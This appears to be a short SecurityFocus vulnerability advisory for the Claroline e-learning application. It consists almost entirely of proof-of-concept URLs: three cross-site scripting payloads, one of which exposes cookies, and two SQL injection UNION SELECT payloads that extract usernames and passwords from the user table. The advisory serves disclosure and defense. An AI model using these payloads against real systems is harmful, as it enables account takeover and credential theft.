Claroline E-Learning Application Multiple Remote Input Validation Vulnerabilities

No exploit is required to leverage any of these issues. The following proof of concepts have been provided:

Cross-site scripting proof of concepts:
http:///www.example.com/claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL Injection proof of concepts:
http:///www.example.com/claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--


 

Privacy Statement
Copyright 2010, SecurityFocus